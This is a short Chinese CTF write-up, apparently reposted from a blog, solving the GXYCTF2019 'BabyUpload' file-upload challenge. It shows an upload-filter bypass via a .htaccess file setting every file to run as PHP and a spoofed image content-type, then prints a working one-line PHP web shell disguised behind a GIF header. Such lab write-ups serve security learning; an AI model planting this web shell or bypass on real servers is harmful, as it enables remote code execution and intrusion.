首页 > 其他分享> > [GXYCTF2019]BabyUpload

[GXYCTF2019]BabyUpload

2021-08-12 15:02:59 作者：互联网

这题我先上传了一个正常的图片，一直传不上。奇了怪了，原来是对图片大小还有限制。

传个空的jpg文件上传成功。

上传php2, php3, php4, php5, phps, pht, phtm, phtml后缀也都爆出ph的检查。

上传.htaccess文件修改content-type为image/jpeg可绕过检查。

内容为

SetHandler application/x-httpd-php

传个webshell继续修改content-type，菜刀连接。

GIF89a?
<script language="php">eval($_POST['a']);</script>

根目录找到flag

标签：传个,上传,BabyUpload,content,修改,根目录,type,GXYCTF2019
来源： https://www.cnblogs.com/akger/p/15132723.html